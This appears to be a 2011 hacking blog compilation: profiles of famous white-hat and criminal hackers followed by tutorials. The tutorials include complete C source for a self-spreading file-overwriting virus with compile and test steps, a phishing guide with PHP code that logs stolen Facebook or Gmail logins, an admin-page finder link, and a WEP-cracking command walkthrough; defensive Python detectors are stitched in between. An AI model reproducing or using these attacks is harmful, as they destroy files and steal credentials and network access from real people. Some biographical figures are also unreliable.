Wednesday, September 28, 2011

The world's top 5 Non-Criminal hackers

Hackers that use their hacking skills for good are referred to as "white hat" hackers. Often called ethical hackers, these non-criminal hackers are hired by companies to examine and test the integrity of their systems. Other white hat hackers operate without company permission, bending but not breaking the law, and in the process have created some very cool features. This article examines and selects the five best non-criminal hackers and the innovations and technologies that they have developed:

1. Stephen Wozniak

Nicknamed Woz, he is often referred to as the other Steve of Apple. Wozniak and Steve Jobs co-founded Apple Computer. Woz started his hacking making blue boxes, which are devices that bypass telephone switching mechanisms, enabling users to make free long distance calls. Woz and Jobs sold these blue boxes to their classmates in college and even used a blue box to call the Pope while pretending to be Henry Kissinger.
Wozniak dropped out of college and invented the computer that made him famous. Jobs had the idea to sell the computer as a fully assembled PC board. The idea was conceived and developed in Jobs's garage. Wozniak and Jobs sold the first 100 of the Apple I to a local dealer for $666.66 each.
Woz currently focuses on philanthropy and no longer works full time for Apple. "Wozniak 'adopted' the Los Gatos School District, providing students and teachers with hands-on teaching and donations of state-of-the-art technology equipment."

2. Tim Berners-Lee

Berners-Lee is credited with being the inventor of the World Wide Web. Berners-Lee has been honored with numerous recognitions including the Millennium Technology Prize.
Berners-Lee was first caught hacking access codes with a friend while a student at Oxford University. He was then banned from the University computers.
Berners-Lee realized that hypertext could be joined with the Internet. Berners-Lee recounts how he put them together: "I just had to take the hypertext idea and connect it to the TCP and DNS ideas and – ta-da! – the World Wide Web."
Since his creation of the World Wide Web, Berners-Lee founded the World Wide Web Consortium at MIT. The W3C describes itself as "an international consortium where Member organizations, a full-time staff and the public work together to develop Web standards." Berners-Lee's World Wide Web idea, as well as standards from the W3C, is distributed freely with no patent or royalties due.

3. Linus Torvalds

Torvalds fathered Linux, the very popular Unix-based operating system. He calls himself "an engineer," and has said that his aspirations are simple, "I just want to have fun making the best damn operating system I can."
Torvalds got his start in computers with a Commodore VIC-20, an 8-bit home computer. He then moved on to a Sinclair QL. Wikipedia reports that he modified the Sinclair "extensively, especially its operating system." Specifically, Torvalds hacks included "an assembler and a text editor…as well as a few games."
Torvalds created the Linux kernel in 1991, using the Minix operating system as inspiration. He started with a task switcher in Intel 80386 assembly and a terminal driver. After that, he put out a call for others to contribute code, which they did. Today only about 2 percent of the Linux kernel is written by Torvalds himself. The success of this public invitation to contribute code for Linux is touted as one of the most prominent examples of free/open source software.
Currently, Torvalds serves as the Linux ringleader, coordinating the code that volunteer programmers contribute to the kernel. He has had an asteroid named after him and received honorary doctorates from Stockholm University and University of Helsinki. He was also featured in Time Magazine's "60 Years of Heroes."

4. Richard Stallman

Stallman's fame derives from the GNU Project, which he founded to develop a free operating system. For this, he's known as the father of free software. His "Serious Bio" asserts, "Non-free software keeps users divided and helpless, forbidden to share it and unable to change it. A free operating system is essential for people to be able to use computers in freedom."
Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker" on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.
Stallman's crusade for free software started with a printer. At the MIT lab, he and other hackers were allowed to modify code on printers so that they sent convenient alert messages. However, a new printer came along – one that they were not allowed to modify. It was located away from the lab and the absence of the alerts presented an inconvenience. It was at this point that he was "convinced…of the ethical need to require free software."
With this inspiration, he began work on GNU. Stallman wrote an essay, "The GNU Project," in which he recalls choosing to work on an operating system because it's a foundation, "the crucial software to use a computer." At this time, the GNU/Linux version of the operating system uses the Linux kernel started by Torvalds. GNU is distributed under "copyleft," a method that employs copyright law to allow users to use, modify, copy and distribute the software.
Stallman's life continues to revolve around the promotion of free software. He works against movements like Digital Rights Management (or as he prefers, Digital Restrictions Management) through organizations like Free Software Foundation and League for Programming Freedom. He has received extensive recognition for his work, including awards, fellowships and four honorary doctorates.

5. Tsutomu Shimomura

Shimomura reached fame in an unfortunate manner: he was hacked by Kevin Mitnick. Following this personal attack, he made it his cause to help the FBI capture him.
Shimomura's work to catch Mitnick is commendable, but he is not without his own dark side. Author Bruce Sterling recalls: "He pulls out this AT&T cellphone, pulls it out of the shrinkwrap, finger-hacks it, and starts monitoring phone calls going up and down Capitol Hill while an FBI agent is standing at his shoulder, listening to him."
Shimomura out-hacked Mitnick to bring him down. Shortly after finding out about the intrusion, he rallied a team and got to work finding Mitnick. Using Mitnick's cell phone, they tracked him near Raleigh-Durham International Airport. The article, "SDSC Computer Experts Help FBI Capture Computer Terrorist" recounts how Shimomura pinpointed Mitnick's location. Armed with a technician from the phone company, Shimomura "used a cellular frequency direction-finding antenna hooked up to a laptop to narrow the search to an apartment complex." Mitnick was arrested shortly thereafter. Following the pursuit, Shimomura wrote a book about the incident with journalist John Markoff, which was later turned into a movie.

The world's top 5 criminal hackers

The Black Hat Hackers - Criminals

These hackers are the ones that you've seen in shackles, arrested for cybercrimes when they were just getting out of puberty. Some have done it for financial gain, others just for fun.

1. Kevin Mitnick.

Mitnick is perhaps synonymous with Hacker. The Department of Justice still refers to him as "the most wanted computer criminal in United States history." His accomplishments were memorialized into two Hollywood movies: Takedown and Freedom Downtime.
Mitnick got his start by exploiting the Los Angeles bus punch card system and getting free rides. Then, like Steve Wozniak of Apple, Mitnick tried phone phreaking. Mitnick was first convicted for hacking into the Digital Equipment Corporation's computer network and stealing software.
Mitnick then embarked on a two and a half year coast to coast hacking spree. He has stated that he hacked into computers, scrambled phone networks, stole corporate secrets and hacked into the national defense warning system. His fall came when he hacked into fellow computer expert and hacker Tsutomu Shimomura's home computer.
Mitnick is now a productive member of society. After serving 5 years and 8 months in solitary confinement, he is now a computer security author, consultant and speaker.

2. Adrian Lamo

Lamo hit major organizations hard, hacking into Microsoft and The New York Times. Lamo would use Internet connections at coffee shops, Kinko's and libraries to achieve his feats, earning him the nickname "The Homeless Hacker". Lamo frequently found security flaws and exploited them. He would often inform the companies of the flaw.
Lamo's hit list includes Yahoo!, Citigroup, Bank of America and Cingular. Of course, white hat hackers do this legally because they are hired by the company to do so; Lamo, however, was breaking the law.
Lamo's intrusion into The New York Times intranet placed him squarely in the eyes of the top cyber crime offenders. For this crime, Lamo was ordered to pay $65,000 in restitution. Additionally, he was sentenced to six months home confinement and 2 years probation. Probation expired January of 2007. Lamo now is a notable public speaker and award winning journalist.

3. Jonathan James

At 16 years old, James gained enormous notoriety when he was the first minor to be sent to prison for hacking. He later admitted that he was just having fun and looking around and enjoyed the challenge.
James hit high profile organizations including the Defense Threat Reduction Agency, which is an agency of the Department of Defense. With this hack he was able to capture usernames and passwords and view highly confidential emails.
James also hacked into NASA computers and stole software valued at over $1.7 million. The Justice Department was quoted as saying: "The software stolen by James supported the International Space Station's physical environment, including control of the temperature and humidity within the living space." Upon discovering this hack, NASA had to shut down its entire computer system, costing taxpayers $41,000. Today James aspires to start a computer security company.

4. Robert Tappan Morris

Morris is the son of a former National Security Agency scientist named Robert Morris. Robert is the creator of the Morris worm. This worm was credited as the first computer worm spread through the Internet. Because of his actions, he was the first person to be prosecuted under the 1986 Computer Fraud and Abuse Act.
Morris created the worm while a student at Cornell, claiming that he intended to use the worm to see how large the Internet was at the time. The worm, however, reproduced itself uncontrollably, shutting down many computers until they had completely malfunctioned. Experts claim 6,000 machines were destroyed. Morris was ultimately sentenced to three years' probation, 400 hours of community service and assessed a $10,500 fine.
Morris is now a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. His focus is computer network architecture.

5. Kevin Poulsen

Frequently referred to as Dark Dante, Poulsen gained national recognition for his hack into Los Angeles radio's KIIS-FM phone lines. These actions earned him a Porsche among many other items.
The FBI began to search for Poulsen when he hacked into the FBI database and federal computers for sensitive wiretap information. Poulsen's specialty was hacking into phone lines, and he frequently took over all of a station's phone lines. Poulsen also reactivated old Yellow Pages escort telephone numbers for a partner who operated a virtual escort agency. Poulsen was featured on Unsolved Mysteries and then captured in a supermarket. He was assessed a sentence of five years.
Since his time in prison, Poulsen has worked as a journalist and was promoted to senior editor for Wired News. His most popular article details his work on identifying 744 sex offenders with Myspace profiles.

Creating a virus : Tutorial


This program is an example of how to create a virus in C. It demonstrates a simple virus which, upon execution (running), writes a copy of itself over the other files in the current directory. Thus it destroys other files by infecting them. But the virus-infected file is also capable of spreading the infection to another file, and so on. Here's the source code of the virus program.
 
#include <stdio.h>
#include <io.h>
#include <dos.h>
#include <dir.h>
#include <conio.h>
#include <time.h>

FILE *virus, *host;
int done, a = 0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st, end;

void main()
{
    st = clock();
    clrscr();
    done = findfirst("*.*", &ffblk, 0);     /* first entry in the current directory */
    while (!done)
    {
        virus = fopen(_argv[0], "rb");        /* the running program's own image */
        host = fopen(ffblk.ff_name, "rb+");   /* the file about to be overwritten */
        if (host == NULL) goto next;
        x = 89088;                            /* size of the compiled EXE in bytes; see COMPILING METHOD */
        printf("Infecting %s\n", ffblk.ff_name);
        while (x > 2048)                      /* copy the image in 2048-byte blocks */
        {
            fread(buff, 2048, 1, virus);
            fwrite(buff, 2048, 1, host);
            x -= 2048;
        }
        fread(buff, x, 1, virus);             /* copy the remaining tail */
        fwrite(buff, x, 1, host);
        a++;
    next:
        {
            fcloseall();
            done = findnext(&ffblk);
        }
    }
    printf("DONE! (Total Files Infected= %d)", a);
    end = clock();
    printf("TIME TAKEN=%f SEC\n", (end - st) / CLK_TCK);
    getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9, THIS WILL INFECT ALL THE FILES IN THE CURRENT DIRECTORY INCLUDING YOUR COMPILER)
3. Note down the size of the generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR ITS SIZE)
4. Change the value of x in the source code to the noted down size (IN THE ABOVE SOURCE CODE x = 89088; CHANGE IT)
5. Once again follow STEP 1 & STEP 2. Now the generated EXE file is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once, note down the generated EXE file length in bytes
2. Change the value of x in the source code to this length in bytes
3. Recompile it. The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there; you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
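A defender-side check for the kind of overwriting infector described above, added here as an example and not part of the original tutorial. Because the program writes its own first x bytes over every file it can open, all infected files in a directory become byte-identical up to that length, and each of them stops matching whatever hash it had before. The script below flags both symptoms: groups of files that share a long identical prefix, and files whose full hash differs from a recorded baseline. The directory, file names and prefix length are constructed for the demonstration.

```python
"""Spot an overwriting infector by shared file prefixes and a hash baseline.

Added example; not code from the tutorial above. All sample files are constructed.
"""
import hashlib
import os
import shutil
import tempfile
from collections import defaultdict

# Constructed value: the infector overwrites the first x bytes of every file it opens,
# so a prefix shorter than x is enough to compare. 4096 is an assumption for this demo.
PREFIX_LEN = 4096


def prefix_digest(path, n=PREFIX_LEN):
    """SHA-256 of the first n bytes of a file."""
    with open(path, "rb") as f:
        return hashlib.sha256(f.read(n)).hexdigest()


def full_digest(path):
    """SHA-256 of the whole file, used for the integrity baseline."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def shared_prefix_groups(directory, n=PREFIX_LEN):
    """Return lists of files whose first n bytes are identical.

    Unrelated executables never share several kilobytes of identical header and code,
    so any group of two or more is the fingerprint of an overwriting infector."""
    groups = defaultdict(list)
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and os.path.getsize(path) >= n:
            groups[prefix_digest(path, n)].append(name)
    return [names for names in groups.values() if len(names) > 1]


def take_baseline(directory):
    """Record a full-file hash per file; compare later with changed_since()."""
    return {name: full_digest(os.path.join(directory, name))
            for name in sorted(os.listdir(directory))
            if os.path.isfile(os.path.join(directory, name))}


def changed_since(directory, baseline):
    """Names whose content no longer matches the baseline (modified or newly added)."""
    current = take_baseline(directory)
    return sorted(name for name, digest in current.items() if baseline.get(name) != digest)


def demo():
    """Constructed fixture: three distinct files, a baseline, then two of them get the
    same 6144-byte body written over their start, which is the state the infector above
    leaves behind. Returns (shared prefix groups, files changed since the baseline)."""
    d = tempfile.mkdtemp()
    try:
        clean = {"a.exe": b"A" * 8192, "b.exe": b"B" * 8192, "c.exe": b"C" * 8192}
        for name, data in clean.items():
            with open(os.path.join(d, name), "wb") as f:
                f.write(data)
        base = take_baseline(d)
        assert shared_prefix_groups(d) == []          # clean directory: no shared prefixes
        body = bytes(range(256)) * 24                 # constructed stand-in for the infector image
        for name in ("a.exe", "c.exe"):
            with open(os.path.join(d, name), "r+b") as f:
                f.write(body)                         # prefix replaced, tail left intact
        return shared_prefix_groups(d), changed_since(d, base)
    finally:
        shutil.rmtree(d)
```

The prefix check needs no prior knowledge of the directory, which makes it useful for triage on a machine with no baseline; the hash baseline catches any modification at all, including an infector smaller than PREFIX_LEN, and is the check to run on a schedule.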

Fasttrack - an automated penetration tool for linux

Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when a h4cker was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming.


In an effort to reproduce some advanced attacks and propagate them down, he ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but for penetration testers they are extremely common findings. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back, relax, crank open a can of Jolt Cola and enjoy the ride.


Installing Fast-Track:
Make sure you have the latest version of Subversion.

Open a terminal and type the following command (in Linux, of course):


svn co http://svn.thepentest.com/fasttrack /path-to-install/

svn co simply means "check out" the latest version of Fast-Track; /path-to-install/ is the directory into which you want to install Fast-Track.

If you want to update Fast-Track after you check out the files, simply type svn update, or use the Fast-Track menu to update.

When you first check out Fast-Track, there are a few modules that need to be installed, fortunately, Fast-Track comes with a setup file that helps you install the files needed. From the command line and in the Fast-Track menu, simply type:

python setup.py install

Follow the guide for installing Fast-Track, note that the setup does NOT install Metasploit for you. If you don't have Metasploit installed, some applications will not work properly. Ensure that you enter the right path to Metasploit.

Once installation has finished, run Fast-Track; if it errors out saying you do not have the proper requirements, type yes to try a different type of install. If this still doesn't work you will need to manually install the requirements.



Now to run Fast-Track, type:
./fast-track.py

To run the web GUI mode:
./ftgui
Open a browser and go to http://127.0.0.1:44444

Fast-Track HomePage: http://www.thepentest.com


Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.

Phishing has become a very easy trick to hack users' usernames and passwords. Here I demonstrate how to create a fake phishing page for almost any social networking site, email service or any other site that has a login form.

For this trick you would need a hosting account, which you can get easily.
Register yourself at t35, host1free, 110mb etc.
Note: 110mb checks for phishing pages on their site and removes them.



So now you have a hosting account, so let's create a fake page:

First go to the target site. In your browser select Save As from the File menu and save the site on your hard disk with the name "login.htm".

Alternatively, right click on the page, click "view source", copy all of it and save it to a Notepad file. Rename the file "login.htm".

Now the second part of the hack-
Go to Notepad and copy this into it-



<?php
header('Location: http://www.facebook.com');   // redirect once the form has been submitted

$handle = fopen("log.txt", "a");               // append every submitted field to log.txt

foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}

fwrite($handle, "\r\n");
fclose($handle);

exit;
?>


Replace facebook.com with the URL you want the user to go to after clicking the submit button.

Save the page as fish.php


Now you need to edit the "login.htm" file we saved earlier, so open it with Notepad.
Search for anything like "action=" that has something to do with login, and replace the URL with "fish.php".

Also create a blank txt file with the name "log.txt". This file would be used to save the logins and passwords.
Now you are done.

Go to your hosting account and upload all the files to your server.
Now go to the URL provided by your host.

Like - http://g00glepage.t35.com/login.htm

And you would see the fake page as it is.
Now enter the username and password.

Check the log.txt file. The username and password you entered previously would be saved in the log.txt file.

Here you have a working phishing page.
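The edit the tutorial describes, pointing the login form's action at a local script such as fish.php, is also what a defender looks for when triaging a suspected cloned login page. The following is an added example, not part of the original post: it parses the saved HTML, finds every form that contains a password field, resolves its action against the page URL, and flags any form that submits to a host other than the legitimate login host. The HTML, hostnames and page URL are constructed for the demonstration.

```python
"""Flag login forms on a saved page that post anywhere other than the legitimate host.

Added example; not code from the tutorial above. Sample page and hosts are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginFormCollector(HTMLParser):
    """Collect every <form> on a page and note whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_login_forms(html, page_url, legit_hosts):
    """Return the resolved action URLs of password forms that submit to a host
    outside legit_hosts. page_url is where the page was served from, so a relative
    action like "fish.php" resolves to the hosting site rather than the real service."""
    parser = LoginFormCollector()
    parser.feed(html)
    flagged = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        target = urljoin(page_url, form["action"])
        host = urlsplit(target).hostname or ""
        if host not in legit_hosts:
            flagged.append(target)
    return flagged


# Constructed sample: a saved login page whose form action was rewritten to a local
# PHP script (the edit described above), plus an untouched search form without a password.
CLONED_PAGE = """
<html><body>
<form action="fish.php" method="post">
  <input type="text" name="email"><input type="password" name="pass">
  <input type="submit" value="Log In">
</form>
<form action="https://www.example-login.test/search" method="get">
  <input type="text" name="q">
</form>
</body></html>
"""


def demo():
    # Hostnames and page URL are constructed placeholders for this example.
    return suspicious_login_forms(
        CLONED_PAGE,
        page_url="http://lookalike-host.example/login.htm",
        legit_hosts={"www.example-login.test"},
    )
```

Resolving the action against the page URL matters: a relative action looks harmless in isolation, but once a cloned page is hosted elsewhere it sends the credentials to the hosting site, which is exactly the mismatch the check reports.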

Finding admin page of any site

A web site can easily be hacked if you know how to hack the admin of the website. For that you need to know the admin page of the website, and finding it can be a headache sometimes.


So here is a page made by a hacker that works for you and searches the site for the admin page.

http://sc0rpion.ir/af/

Just go to the site and enter the url of the site or blog followed by a  "/" and it would search for all those pages it thinks to be admin pages. Quite simple.

How it works-
The site has a huge list of admin page names commonly occurring on the web. It just appends those to the URL one by one and tests whether a page by that name exists or not.
If there is any admin page, it would show up.
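From the defender's side, a tool that appends a long list of candidate admin page names to a URL one by one leaves a distinctive trail in the web server's access log: a single client producing many 404s for different paths within a few seconds. The following is an added example (not code from the site above) that parses Common Log Format lines and flags clients exceeding a threshold of distinct 404 paths inside a sliding time window. The log lines, addresses and thresholds are constructed.

```python
"""Detect wordlist-driven admin-page probing in web server access logs.

Added example for the admin-page finder described above; not code from that site.
The log lines below are constructed and use the Common Log Format.
"""
import re
from collections import defaultdict
from datetime import datetime

# Common Log Format: client ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (ip, timestamp, path, status), or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def path_probers(lines, window_seconds=60, threshold=5):
    """Clients that produced at least `threshold` distinct 404 paths inside any
    `window_seconds` span. A tool walking a list of guessed names leaves exactly this
    burst of misses; a person following a dead link does not.
    Returns {ip: sorted list of every 404 path that client requested}."""
    misses = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[3] == 404:
            misses[rec[0]].append((rec[1], rec[2]))
    flagged = {}
    for ip, events in misses.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the span fits inside window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = {path for _, path in events[start:end + 1]}
            if len(distinct) >= threshold:
                flagged[ip] = sorted({path for _, path in events})
                break
    return flagged


# Constructed sample log: one client walks a short list of guessed paths in 15 seconds,
# another browses normally and hits a single dead link.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Sep/2011:13:55:01 +0000] "GET /admin/ HTTP/1.1" 404 162',
    '203.0.113.7 - - [28/Sep/2011:13:55:03 +0000] "GET /admin.php HTTP/1.1" 404 162',
    '203.0.113.7 - - [28/Sep/2011:13:55:06 +0000] "GET /administrator/ HTTP/1.1" 404 162',
    '203.0.113.7 - - [28/Sep/2011:13:55:09 +0000] "GET /login.php HTTP/1.1" 404 162',
    '203.0.113.7 - - [28/Sep/2011:13:55:12 +0000] "GET /cpanel/ HTTP/1.1" 404 162',
    '203.0.113.7 - - [28/Sep/2011:13:55:16 +0000] "GET /manager/ HTTP/1.1" 404 162',
    '198.51.100.4 - - [28/Sep/2011:13:55:02 +0000] "GET / HTTP/1.1" 200 5120',
    '198.51.100.4 - - [28/Sep/2011:13:55:20 +0000] "GET /old-post.html HTTP/1.1" 404 162',
    '198.51.100.4 - - [28/Sep/2011:13:55:25 +0000] "GET /about.html HTTP/1.1" 200 2048',
]


def demo():
    return path_probers(SAMPLE_LOG)
```

Counting distinct paths rather than raw 404s keeps a browser retrying one broken image from tripping the rule, and the sliding window keeps a day's worth of scattered typos from adding up to an alert.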

Backtrack : The linux distro made for and by hackers


Linux is obviously the best tool to try your hacking skills on, as it is robust, made by hackers, gives you all tools for free and lets you do what you want with it. To start your hacking stuff you need to get a lot of tools, and you might be stuck when some tool starts throwing errors and wish that your system had all of these installed beforehand. This is where Backtrack comes into the picture.

Backtrack Linux is just what every hacker dreams of: a full system preloaded with every tool you would ever have wished for. It has almost every tool ever invented for hackers to lay their hands on.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.

Backtrack was made for everyone, including tools for amateur hackers through to deep black hats.

Download Backtrack here:
Normal download     Torrent

A few Tools

BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:

* Metasploit integration
* RFMON Injection capable wireless drivers
* Kismet
* Nmap
* Ettercap
* Wireshark (formerly known as Ethereal)
* BeEF (Browser Exploitation Framework)
* Hydra

It also ships a large collection of exploits as well as more commonplace software such as browsers. BackTrack arranges tools into 11 categories:

* Information Gathering
* Network Mapping
* Vulnerability Identification
* Web Application Analysis
* Radio Network Analysis (802.11, Bluetooth, RFID)
* Penetration (Exploit & Social Engineering Toolkit)
* Privilege Escalation
* Maintaining Access
* Digital Forensics
* Reverse Engineering
* Voice Over IP
Source- http://www.backtrack-linux.org/

Wireless Hacking tutorial using Backtrack

Wireless hacking with Backtrack 3 is easy to do; in this article I'd like to guide you through wireless hacking with Backtrack 3. This tutorial was made based on some requests by my subscribers, who are already familiar enough with Backtrack 3. In order to start the wireless hacking, you need to make sure that you have met these requirements:
 

- Backtrack 3 or newer release

- 1 wireless router

- Laptop with wireless card

And let the hack begin:

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request reinjection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, or connecting to the AP.

***********************************************************************
Here are some things you need to know before you get confused:
When you see (device) or (bssid) you DON'T type the ( )!!!
(device) = Your wireless card *can be seen by typing iwconfig, EG: eth0, eth1, ath0, ath1
(bssid) = This is the consenting computer's BSSID *when you start airodump-ng, if there is an AP in range it will show up on the left side and will look similar to 00:11:22:33:44:55
************************************************************************

Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons, Home and System. Double click the Home icon, right click the blank white area and select Create New > Text File; name it Exidous or whatever you want, click OK, then close the window.

Ok let’s start!
Commands | Meaning
====================

* Open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing we're going to do is stop the device, aka the ethernet card
airmon-ng stop ath0

* Now we're going to put the wireless card down, so we can fake a MAC address (to see available wireless cards, type iwconfig)
ifconfig (device) down



* Ok now, just to make things simpler, so we don't have to hunt down what our MAC address is
macchanger --mac 00:11:22:33:44:55 (device)

* Now we're going to start the wireless card *make it listen for AP's
airmon-ng start (device)

* Lets start seeing what AP’s are there
airodump-ng (device)

* After you see all the AP’s execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of consenting computer

* Now on to the consenting computer's AP (we're listening in for authentication packets)
airodump-ng -c 6 -w Exidous --bssid (bssid) (device)

* Let's get on with making more data, and start the injection process
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now we're going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV’s for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV’s for 128 bit encryption
aircrack-ng -n 64 --bssid (bssid) Exidous-01.cap

* Once you crack the WEP key, write it down and reboot to Windows. Now put it in the username and the password without the :
EG: WEP Key = 33:C7:C6:09:30
When entered into username and password it will look like this: 33C7C60930

Get backtrack linux at - http://www.backtrack-linux.org/